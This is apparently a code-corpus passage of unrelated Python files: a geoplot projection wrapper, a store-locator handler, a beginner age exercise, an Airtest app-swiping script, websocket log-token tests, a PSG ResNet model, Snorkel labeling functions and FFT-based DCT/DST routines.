`_as_mpl_axes` : Return the result of calling cartopy's ``_as_mpl_axes`` for `self.load`
called with empty `df` and `centerings`.
"""
def __init__(self, **kwargs):
"""Save parameters that initialize Cartopy CRSs."""
self.args = kwargs
def load(self, df, centerings):
"""
A meta-method which abstracts the internals of individual projections' load procedures.
Parameters
----------
df : GeoDataFrame
The GeoDataFrame which has been passed as input to the plotter at the top level.
This data is needed to calculate reasonable centering variables in cases in which the
user does not already provide them; which is, incidentally, the reason behind all of
this funny twice-instantiation loading in the first place.
centerings: dict
A dictionary containing names and centering methods. Certain projections have certain
centering parameters whilst others lack them. For example, the geospatial projection
contains both ``central_longitude`` and ``central_latitude`` instance parameter, which
together control the center of the plot, while the North Pole Stereo projection has
only a ``central_longitude`` instance parameter, implying that latitude is fixed (as
indeed it is, as this projection is centered on the North Pole!).
A top-level centerings method is provided in each of the ``geoplot`` top-level plot
functions; each of the projection wrapper classes defined here in turn selects the
functions from this list relevant to this particular instance and passes them to
the ``_generic_load`` method here.
We then in turn execute these functions to get defaults for our ``df`` and pass them
off to our output ``cartopy.crs`` instance.
Returns
-------
crs : ``cartopy.crs`` object instance
Returns a ``cartopy.crs`` object instance whose appropriate instance variables have
been set to reasonable defaults wherever not already provided by the user.
"""
return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args})
def _as_mpl_axes(self):
"""
When ``matplotlib`` is provided a projection via a ``projection`` keyword argument, it
expects to get something with a callable ``as_mpl_axes`` method. The precise details of
what this method does, exactly, are not important: it suffices to know that every
``cartopy`` coordinate reference system object has one.
When we pass a ``geoplot.crs`` crs object to a ``geoplot`` function, the loading and
centering of the data occurs automatically (using the function defined immediately above).
Since we control what ``geoplot`` does at execution, we gracefully integrate this two-step
procedure into the function body.
But there are also use cases outside of our control in which we are forced to pass a
``geoplot.crs`` object without having first called ``load``: most prominently, when
creating a plot containing subplots, the "overall" projection must be pre-loaded. It's
possible to get around this by using ``cartopy.crs`` objects instead, but this is
inelegant. This method is a better way: when a ``geoplot.crs`` object called by
``matplotlib``, it silently swaps itself out for a vanilla version of its ``cartopy.crs``
mirror, and calls that function's ``_as_mpl_axes`` instead.
Parameters
----------
proj : geoplot.crs projection instance
The instance in question (self, in the method body).
Returns
-------
Mutates into a ``cartopy.crs`` object and returns the result of executing ``_as_mpl_axes``
on that object instead.
"""
proj = self.load(gpd.GeoDataFrame(), dict())
return proj._as_mpl_axes()
class Filtering(Base):
"""CRS that `load`s with `centering` restricted to keys in `self.filter_`."""
def load(self, df, centerings):
"""Call `load` method with `centerings` filtered to keys in `self.filter_`."""
return super().load(
df,
{key: value
for key, value in centerings.items()
if key in self.filter_}
)
class LongitudeCentering(Filtering):
"""Form a CRS that centers by longitude."""
filter_ = {'central_longitude'}
class LatitudeCentering(Filtering):
"""For a CRS that centers by latitude."""
filter_ = {'central_latitude'}
PlateCarree,\
LambertCylindrical,\
Mercator,\
Miller,\
Mollweide,\
Robinson,\
Sinusoidal,\
InterruptedGoodeHomolosine,\
Geostationary,\
NorthPolarStereo,\
SouthPolarStereo = tuple(
type(name, (LongitudeCentering,), {})
for name in ('PlateCarree',
'LambertCylindrical',
'Mercator',
'Miller',
'Mollweide',
'Robinson',
'Sinusoidal',
'InterruptedGoodeHomolosine',
'Geostationary',
'NorthPolarStereo',
'SouthPolarStereo')
)
Gnomonic = type('Gnomonic', (LatitudeCentering,), {})
AlbersEqualArea,\
AzimuthalEquidistant,\
LambertConformal,\
Orthographic,\
Stereographic,\
TransverseMercator,\
LambertAzimuthalEqualArea,\
UTM,\
OSGB,\
EuroPP,\
OSNI = tuple(
type(name, (Base,), {})
for name in ('AlbersEqualArea',
'AzimuthalEquidistant',
'LambertConformal',
'Orthographic',
'Stereographic',
'TransverseMercator',
'LambertAzimuthalEqualArea',
'UTM',
'OSGB',
'EuroPP',
'OSNI')
)
| 2.71875 | 3 |
api/views/stores/att_handler.py | cderwin/maps | 0 | 1218 | from .default_handler import StoresHandler
class ATTStoresHandler(StoresHandler):
def handle_request(self, **kwargs):
kwargs.update({'provider': 'att'})
return super(ATTStoresHandler, self).handle_request(**kwargs)
def get_url(self, **kwargs):
lat = float(kwargs.get('lat'))
lon = float(kwargs.get('lon'))
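# Build a bounding box spanning one degree in each direction around the requested point.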
sw_corner = "{0},{1}".format(lat - 1, lon - 1)
ne_corner = "{0},{1}".format(lat + 1, lon + 1)
return self.config[kwargs['provider']]['url'].format(lat=lat, lon=lon, sw_corner=sw_corner, ne_corner=ne_corner)
| 2.609375 | 3 |
pythonProject/MUNDO 2/Desafio 54.py | lucasjlgc/Aulas-de-Python- | 0 | 1219 | #Leia o ano de nascimento de 7 pessoas e mostre quantas ja atingiram a maioridade e quantas ainda não
for c in range(1,8):
p=int(input('Qual o ano de seu nascimento? '))
a=2021-p
if a>= 18:
print('A pessoa numero {} já é maior de idade'.format(c))
else:
print('A pessoa numero {} não é maior de idade!'.format(c))
| 3.859375 | 4 |
tmoga/utils/SDE.py | zjg540066169/tmoga | 2 | 1220 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Provide function to calculate SDE distance
@auth: <NAME>
@date: 2021/05/05
"""
def SDE(front, values1, values2):
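# Shift-based density estimation (SDE): for each solution i on the front, keep its own objective
# pair plus the objective pairs of every other solution j shifted towards i (component-wise minimum).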
shifted_dict = {}
for i in front:
shifted_dict[i] = [(values1[i], values2[i])]
shifted_list = []
for j in front:
if i == j:
continue
else:
shifted_list.append((min(values1[i], values1[j]), min(values2[i], values2[j])))
shifted_dict[i].append(shifted_list)
return shifted_dict
| 3.171875 | 3 |
a1.py | pscly/shua_shouji | 0 | 1221 | <filename>a1.py
# -*- encoding=utf8 -*-
__author__ = "pscly"
from airtest.core.api import *
from airtest.cli.parser import cli_setup
# from douyin import *
if not cli_setup():
auto_setup(__file__, logdir=True, devices=[
"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH",
])
# script content
print("start...")
print("冲冲冲!")
print("-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=")
print("-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=")
print("-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=")
wake() # wake up the phone
start_app("com.ss.android.ugc.aweme.lite")
hua = 0
滑动方向 = 0
while 1:
hua += 1
滑动方向 += 1
if hua == 10:
touch(Template(r"tpl1607564875731.png", record_pos=(-0.404, -0.67), resolution=(1079, 2340)))
sleep(5)
swipe((484, 1711),(531,709))
print("-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=")
print("-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=")
print("-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=")
# generate html report
# from airtest.report.report import simple_report
# simple_report(__file__, logpath=True)
| 1.867188 | 2 |
tests/v3_validation/cattlevalidationtest/core/test_logs_api.py | bmdepesa/validation-tests | 7 | 1222 | from common_fixtures import * # NOQA
import websocket as ws
import pytest
def get_logs(client):
hosts = client.list_host(kind='docker', removed_null=True)
assert len(hosts) > 0
in_log = random_str()
cmd = '/bin/bash -c "echo {}; sleep 2"'.format(in_log)
c = client.create_container(image=TEST_IMAGE_UUID, command=cmd)
c = client.wait_success(c)
logs = c.logs()
return logs, in_log, c
def test_logs_token(client):
logs, in_log, c = get_logs(client)
conn = ws.create_connection(logs.url + '?token='+logs.token)
result = conn.recv()
assert result is not None
assert in_log in result
delete_all(client, [c])
def test_logs_no_token(client):
logs, _, c = get_logs(client)
with pytest.raises(Exception) as excinfo:
ws.create_connection(logs.url)
assert 'Handshake status 401' in str(excinfo.value)
delete_all(client, [c])
def test_host_api_garbage_token(client):
logs, _, c = get_logs(client)
with pytest.raises(Exception) as excinfo:
ws.create_connection(logs.url+'?token=random.garbage.token')
assert 'Handshake status 401' in str(excinfo.value)
delete_all(client, [c])
| 1.90625 | 2 |
models/psg_seed_resnet.py | VITA-Group/Peek-a-Boo | 2 | 1223 | '''ResNet using PSG in PyTorch.
For Pre-activation ResNet, see 'preact_resnet.py'.
Reference:
[1] <NAME>, <NAME>, <NAME>, <NAME>
Deep Residual Learning for Image Recognition. arXiv:1512.03385
'''
from numpy.lib.arraysetops import isin
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
import numpy as np
from models.masked_psg_seed_conv import PredictiveSeedConv2d
from masked_layers import layers
# Fixed
NUM_BITS = 32
NUM_BITS_WEIGHT = 32
NUM_BITS_GRAD = None
BIPRECISION = False
PREDICTIVE_FORWARD = False
WRITER = None
WRITER_PREFIX_COUNTER = 0
# Tunable
PREDICTIVE_BACKWARD = True
MSB_BITS = 4
MSB_BITS_WEIGHT = 4
MSB_BITS_GRAD = 8
THRESHOLD = 0.0
SPARSIFY = False
SIGN = True
def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=""):
"1x1 convolution with no padding"
predictive_forward = PREDICTIVE_FORWARD and predictive_forward
return PredictiveSeedConv2d(
in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False,
num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD,
biprecision=BIPRECISION, input_signed=input_signed,
predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD,
msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD,
threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN,
writer=WRITER, writer_prefix=writer_prefix)
def conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=""):
"3x3 convolution with padding"
predictive_forward = PREDICTIVE_FORWARD and predictive_forward
return PredictiveSeedConv2d(
in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False,
num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD,
biprecision=BIPRECISION, input_signed=input_signed,
predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD,
msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD,
threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN,
writer=WRITER, writer_prefix=writer_prefix)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
# nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
# self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.conv1 = conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)
self.bn1 = nn.BatchNorm2d(planes)
# self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.conv2 = conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None)
self.bn2 = nn.BatchNorm2d(planes)
# self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
# nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'):
super(ResNet, self).__init__()
self.in_planes = in_planes
self.conv1 = conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None)
self.bn1 = nn.BatchNorm2d(self.in_planes)
if self.in_planes == 64:
# self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
self.linear = nn.Linear(512*block.expansion, num_classes)
#self.linear = layers.Linear(512*block.expansion, num_classes)
elif self.in_planes == 16:
self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2)
self.layer4 = None
self.linear = nn.Linear(64, num_classes)
self.reset_conv_parameters(init_method)
print('conv weights reset to {}'.format(init_method))
def reset_parameters(self, module, init_method="kaiming_uniform") -> None:
if init_method == "kaiming_constant_signed":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "kaiming_constant_unsigned":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = torch.ones_like(module.weight.data) * std
elif init_method == "kaiming_normal":
nn.init.kaiming_normal_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_uniform":
nn.init.kaiming_uniform_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_laplace":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
scale = gain / math.sqrt(2.0 * fan)
with torch.no_grad():
new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape)
module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach())
elif init_method == "xavier_normal":
nn.init.xavier_normal_(module.weight)
elif init_method == "xavier_constant":
fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight)
std = math.sqrt(2.0 / float(fan_in + fan_out))
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "standard":
nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5))
else:
raise ValueError(f"{init_method} is not an initialization option!")
def reset_conv_parameters(self, init_method="standard") -> None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
self.reset_parameters(m, init_method)
def get_bop_params(self):
bop_params = []
for m in self.modules():
if isinstance(m, nn.Conv2d):
bop_params += list(m.parameters())
return bop_params
def get_non_bop_params(self):
non_bop_params = []
for m in self.modules():
if isinstance(m, (nn.Linear, nn.BatchNorm2d,)):
non_bop_params += list(m.parameters())
return non_bop_params
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
if self.layer4 is not None:
out = self.layer4(out)
# out = F.avg_pool2d(out, 4)
out = F.avg_pool2d(out, out.size()[3])
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def PsgSeedResNet20(
num_classes=10,
init_method='standard',
predictive_backward=True,
msb_bits=4,
msb_bits_weight=4,
msb_bits_grad=8,
threshold=0.0,
sparsify=False,
sign=True
):
global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
PREDICTIVE_BACKWARD = predictive_backward
MSB_BITS = msb_bits
MSB_BITS_WEIGHT = msb_bits_weight
MSB_BITS_GRAD = msb_bits_grad
THRESHOLD = threshold
SPARSIFY = sparsify
SIGN = sign
return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method)
def PsgSeedResNet18(
num_classes=10,
init_method='standard',
predictive_backward=True,
msb_bits=4,
msb_bits_weight=4,
msb_bits_grad=8,
threshold=0.0,
sparsify=False,
sign=True
):
global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
PREDICTIVE_BACKWARD = predictive_backward
MSB_BITS = msb_bits
MSB_BITS_WEIGHT = msb_bits_weight
MSB_BITS_GRAD = msb_bits_grad
THRESHOLD = threshold
SPARSIFY = sparsify
SIGN = sign
return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method)
def PsgSeedResNet34(
num_classes=10,
init_method='standard',
predictive_backward=True,
msb_bits=4,
msb_bits_weight=4,
msb_bits_grad=8,
threshold=0.0,
sparsify=False,
sign=True
):
global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
PREDICTIVE_BACKWARD = predictive_backward
MSB_BITS = msb_bits
MSB_BITS_WEIGHT = msb_bits_weight
MSB_BITS_GRAD = msb_bits_grad
THRESHOLD = threshold
SPARSIFY = sparsify
SIGN = sign
return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method)
def PsgSeedResNet50(
num_classes=10,
init_method='standard',
predictive_backward=True,
msb_bits=4,
msb_bits_weight=4,
msb_bits_grad=8,
threshold=0.0,
sparsify=False,
sign=True
):
global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
PREDICTIVE_BACKWARD = predictive_backward
MSB_BITS = msb_bits
MSB_BITS_WEIGHT = msb_bits_weight
MSB_BITS_GRAD = msb_bits_grad
THRESHOLD = threshold
SPARSIFY = sparsify
SIGN = sign
return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method)
def PsgSeedResNet101(
num_classes=10,
init_method='standard',
predictive_backward=True,
msb_bits=4,
msb_bits_weight=4,
msb_bits_grad=8,
threshold=0.0,
sparsify=False,
sign=True
):
global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
PREDICTIVE_BACKWARD = predictive_backward
MSB_BITS = msb_bits
MSB_BITS_WEIGHT = msb_bits_weight
MSB_BITS_GRAD = msb_bits_grad
THRESHOLD = threshold
SPARSIFY = sparsify
SIGN = sign
return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method)
def PsgSeedResNet152(
num_classes=10,
init_method='standard',
predictive_backward=True,
msb_bits=4,
msb_bits_weight=4,
msb_bits_grad=8,
threshold=0.0,
sparsify=False,
sign=True
):
global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
PREDICTIVE_BACKWARD = predictive_backward
MSB_BITS = msb_bits
MSB_BITS_WEIGHT = msb_bits_weight
MSB_BITS_GRAD = msb_bits_grad
THRESHOLD = threshold
SPARSIFY = sparsify
SIGN = sign
return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method)
def test():
net = PsgSeedResNet18()
y = net(torch.randn(1,3,32,32))
print(y.size())
# test()
| 2.71875 | 3 |
drybell/drybell_lfs_spark.py | jsnlp/snorkel-tutorials | 315 | 1224 | <filename>drybell/drybell_lfs_spark.py
from pyspark.sql import Row
from snorkel.labeling.lf import labeling_function
from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function
from snorkel.preprocess import preprocessor
from drybell_lfs import load_celebrity_knowledge_base
ABSTAIN = -1
NEGATIVE = 0
POSITIVE = 1
@preprocessor()
def combine_text(x):
return Row(title=x.title, body=x.body, article=f"{x.title} {x.body}")
@spark_nlp_labeling_function(text_field="article", pre=[combine_text])
def article_mentions_person(x):
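# Abstain as soon as the article mentions a person entity; otherwise vote NEGATIVE.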
for ent in x.doc.ents:
if ent.label_ == "PERSON":
return ABSTAIN
return NEGATIVE
@spark_nlp_labeling_function(
text_field="article",
pre=[combine_text],
resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()),
)
def person_in_db(x, celebrity_knowledge_base):
for ent in x.doc.ents:
if ent.label_ == "PERSON" and ent.text.lower() in celebrity_knowledge_base:
return POSITIVE
return ABSTAIN
@labeling_function()
def body_contains_fortune(x):
return POSITIVE if "fortune" in x.body else ABSTAIN
| 2.578125 | 3 |
dreamplace/ops/dct/discrete_spectral_transform.py | dongleecsu/DREAMPlace | 12 | 1225 | <gh_stars>10-100
##
# @file discrete_spectral_transform.py
# @author <NAME>
# @date Jun 2018
#
import os
import sys
import numpy as np
import torch
import torch.nn.functional as F
import pdb
""" Discrete spectral transformation leveraging fast fourier transform engine.
The math here mainly uses Prosthaphaeresis properties.
The trigonometric identities exploited by prosthaphaeresis relate products of trigonometric functions to sums.
sin(a) sin(b) = 1/2 * (cos(a-b) - cos(a+b))
cos(a) cos(b) = 1/2 * (cos(a-b) + cos(a+b))
sin(a) cos(b) = 1/2 * (sin(a+b) + sin(a-b))
cos(a) sin(b) = 1/2 * (sin(a-b) - sin(a+b))
A 2D FFT performs
y_{u, v} = \sum_i \sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N)
= \sum_i \sum_j x_{i, j} exp(-j*2*pi*(u*i/M + v*j/N))
= \sum_i \sum_j x_{i, j} (cos(-2*pi*(u*i/M + v*j/N)) + j sin(-2*pi*(u*i/M + v*j/N))).
By mapping the original image from (i, j) to (i, N-j), we can have (u*i/M - v*j/N) inside exp.
This will enable us to derive various cos/sin transformation by computing FFT twice.
"""
def get_expk(N, dtype, device):
""" Compute 2*exp(-1j*pi*u/(2N)), but not exactly the same.
The actual return is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)).
This will make later multiplication easier.
"""
pik_by_2N = torch.arange(N, dtype=dtype, device=device)
pik_by_2N.mul_(np.pi/(2*N))
# cos, sin
# I use sin because the real part requires subtraction
# this will be easier for multiplication
expk = torch.stack([pik_by_2N.cos(), pik_by_2N.sin()], dim=-1)
expk.mul_(2)
return expk.contiguous()
def get_expkp1(N, dtype, device):
""" Compute 2*exp(-1j*pi*(u+1)/(2N)), but not exactly the same.
The actual return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N))
"""
neg_pik_by_2N = torch.arange(1, N+1, dtype=dtype, device=device)
neg_pik_by_2N.mul_(np.pi/(2*N))
# sin, -cos
# I swap -cos and sin because we need the imag part
# this will be easier for multiplication
expk = torch.stack([neg_pik_by_2N.cos(), neg_pik_by_2N.sin()], dim=-1)
expk.mul_(2)
return expk.contiguous()
def get_exact_expk(N, dtype, device):
# Compute exp(-j*pi*u/(2N)) = cos(pi*u/(2N)) - j * sin(pi*u/(2N))
pik_by_2N = torch.arange(N, dtype=dtype, device=device)
pik_by_2N.mul_(np.pi/(2*N))
# cos, -sin
expk = torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1)
return expk.contiguous()
def get_perm(N, dtype, device):
""" Compute permutation to generate following array
0, 2, 4, ..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ..., 3, 1
"""
perm = torch.zeros(N, dtype=dtype, device=device)
perm[0:(N-1)//2+1] = torch.arange(0, N, 2, dtype=dtype, device=device)
perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0, -2, dtype=dtype, device=device)
return perm
def dct_2N(x, expk=None):
""" Batch Discrete Cosine Transformation without normalization to coefficients.
Compute y_u = \sum_i x_i cos(pi*(2i+1)*u/(2N)),
    Implements the 2N padding trick to solve DCT with FFT in the following link,
https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft
1. Pad x by zeros
2. Perform FFT
3. Multiply by 2*exp(-1j*pi*u/(2N))
4. Extract the real part
"""
# last dimension
N = x.size(-1)
# pad last dimension
x_pad = F.pad(x, (0, N), 'constant', 0)
# the last dimension here becomes -2 because complex numbers introduce a new dimension
y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :]
y.mul_(1.0/N)
if expk is None:
expk = get_expk(N, dtype=x.dtype, device=x.device)
# get real part
y.mul_(expk)
# I found add is much faster than sum
#y = y.sum(dim=-1)
return y[..., 0]+y[..., 1]
def dct_N(x, perm=None, expk=None):
""" Batch Discrete Cosine Transformation without normalization to coefficients.
Compute y_u = \sum_i x_i cos(pi*(2i+1)*u/(2N)),
    Implements the N permuting trick to solve DCT with FFT in the following link,
https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft
1. permute x such that [a, b, c, d, e, f] becomes [a, c, e, f, d, b]
2. Perform FFT
3. Multiply by 2*exp(-1j*pi*u/(2N))
4. Extract the real part
"""
# last dimension
N = x.size(-1)
if perm is None:
perm = get_perm(N, dtype=torch.int64, device=x.device)
if x.ndimension() <= 1:
x_reorder = x.view([1, N])
else:
x_reorder = x.clone()
# switch from row-major to column-major for speedup
x_reorder.transpose_(dim0=-2, dim1=-1)
#x_reorder = x_reorder[..., perm, :]
x_reorder = x_reorder.index_select(dim=-2, index=perm)
# switch back
x_reorder.transpose_(dim0=-2, dim1=-1)
y = torch.rfft(x_reorder, signal_ndim=1, normalized=False, onesided=False)[..., 0:N, :]
y.mul_(1.0/N)
if expk is None:
expk = get_expk(N, dtype=x.dtype, device=x.device)
# get real part
y.mul_(expk)
# I found add is much faster than sum
#y = y.sum(dim=-1)
return y[..., 0]+y[..., 1]
def idct_2N(x, expk=None):
""" Batch Inverse Discrete Cosine Transformation without normalization to coefficients.
Compute y_u = \sum_i x_i cos(pi*(2u+1)*i/(2N)),
    Implements the 2N padding trick to solve IDCT with IFFT in the following link,
https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py
1. Multiply by 2*exp(1j*pi*u/(2N))
2. Pad x by zeros
3. Perform IFFT
4. Extract the real part
"""
# last dimension
N = x.size(-1)
if expk is None:
expk = get_expk(N, dtype=x.dtype, device=x.device)
# multiply by 2*exp(1j*pi*u/(2N))
x_pad = x.unsqueeze(-1).mul(expk)
# pad second last dimension, excluding the complex number dimension
x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant', 0)
if len(x.size()) == 1:
x_pad.unsqueeze_(0)
# the last dimension here becomes -2 because complex numbers introduce a new dimension
y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N]
y.mul_(N)
if len(x.size()) == 1:
y.squeeze_(0)
return y
def idct_N(x, expk=None):
N = x.size(-1)
if expk is None:
expk = get_expk(N, dtype=x.dtype, device=x.device)
size = list(x.size())
size.append(2)
x_reorder = torch.zeros(size, dtype=x.dtype, device=x.device)
x_reorder[..., 0] = x
x_reorder[..., 1:, 1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1)
x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1]))
x_reorder[..., 1].mul_(expk[..., 0])
x_reorder[..., 1].add_(x.mul(expk[..., 1]))
# this is to match idct_2N
# normal way should multiply 0.25
x_reorder.mul_(0.5)
y = torch.ifft(x_reorder, signal_ndim=1, normalized=False)
y.mul_(N)
z = torch.empty_like(x)
z[..., 0:N:2] = y[..., :(N+1)//2, 0]
z[..., 1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1])
return z
def dst(x, expkp1=None):
""" Batch Discrete Sine Transformation without normalization to coefficients.
Compute y_u = \sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)),
    Implements the 2N padding trick to solve DCT with FFT in the following link,
https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft
1. Pad x by zeros
2. Perform FFT
3. Multiply by 2*exp(-1j*pi*u/(2N))
4. Extract the real part
"""
# last dimension
N = x.size(-1)
# pad last dimension
x_pad = F.pad(x, (0, N), 'constant', 0)
# the last dimension here becomes -2 because complex numbers introduce a new dimension
y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 1:N+1, :]
if expkp1 is None:
expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device)
# get imag part
y = y[..., 1].mul(expkp1[:, 0]) - y[..., 0].mul(expkp1[:, 1])
return y
